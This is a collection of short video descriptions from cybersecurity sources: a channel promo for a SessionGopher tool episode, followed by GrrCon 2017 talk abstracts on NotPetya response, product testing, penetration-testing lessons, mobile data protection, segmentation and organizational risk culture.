Today's episode of The Tool Box features SessionGopher. We breakdown everything you need to know! Including what it does, who it was developed by, and the best ways to use it! Check out Session Gopher here: Github - https://github.com/fireeye/SessionGopher Thanks for watching and don't forget to subscribe to our channel for the latest cybersecurity news! Visit Hacker Arsenal for the latest attack-defense gadgets! https://www.hackerarsenal.com/ FOLLOW US ON: ~Facebook: http://bit.ly/2uS4pK0 ~Twitter: http://bit.ly/2vd5QSE ~Instagram: http://bit.ly/2v0tnY8 ~LinkedIn: http://bit.ly/2ujkyeC ~Google +: http://bit.ly/2tNFXtc ~Web: http://bit.ly/29dtbcn

GrrCon 2017 – Dissecting Destructive Malware and Recovering from Catastrophe

An in depth look into the NotPetya malware outbreak from a boots-on-ground incident responder with first-hand experience assisting organizations through response, recovery and investigation. This talk will cover how NotPetya operates, the geopolitical significance of this attack, ramifications of fake news during NotPetya response efforts, methods to recover certain files encrypted by Salsa20, and what you can do to prepare for similar destructive malware attacks in the future. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – How do you POC? Are you really testing a product

We have all read the reports from the successful breaches from Target to Equifax. Have you ever questioned the nature of the security products not preventing or alerting earlier to breach? Trend Micro,s presentation will focus on the Proof-of-Concept phase of testing a solution from start to finish. Learn the key steps of a POC, and how companies run product tests and what is effective and the errors. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Tales From The Trenches: Practical Information Security Lessons

In this talk, Michael Belton discusses his past experiences delivering penetration testing services. The format for this talk is conversational and audience participation is encouraged. Michael will provide background on the situation, discuss the actual techniques and attacks used in the hack and use that to identify defense-in-depth measures that could have mitigated risk. This talk is intended to learn from the mistakes of the past. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Building a Usable Mobile Data Protection Strategy

Mobile smart devices from the consumer perspective are easy to activate for a enriched user experience. Enable smart devices in the enterprise, after the basics, the user experience they know drops while users and InfoSec demand more with competing agendas. This presentation will provide you with a blueprint of the various mobile data protection technologies. We will review what is provided natively, as well as, third party options to help you decide what will fit best in your environment and corporate culture. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Software Defined Segmentation

Acquisitions, partnerships, BYOD, IoT are just some business demands that increase security headaches for businesses and place demand on IT. Come explore segmentation as a mechanism to combat compromises of one system to another. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – The Shuttle Columbia Disaster: Lessons That Were Not Learned

When the shuttle Challenger was destroyed in 1986, poor NASA culture was significant in the events the led to the disaster. NASA made serious changes to their space program to ensure human life was at the least risk possible. But in 2003, the shuttle Columbia suffered a disaster and all hands were lost upon re-entry. The ensuing investigation specified that "NASA organizational culture had as much to do with this accident as the foam." This talk will look at how culture affects risk in organizations, using both the Challenger and Columbia as examples, and talk about the difficulties of risk management, and give guidance on how to deal with and overcome difficult risk decisions, such as the final decision by NASA not to inform the astronauts they were doomed. Takeaways will be how to understand how culture impacts risk, what you can do about it, and how to make better risk decisions. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Infrastructure Based Security

As the enterprise continues to be bombarded with advanced and increasingly more sophisticated attacks, the CISO must shift to accomplish three critical objectives: Gain Superior Visibility and Control over their environment, Automate tasks that enhance security posture, Utilize integrated systems that identify breaches, and facilitate rapid remediation This can only be done by partnering with vendors that have strong threat research, broad capabilities, powerful tools and integrations with existing tools. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist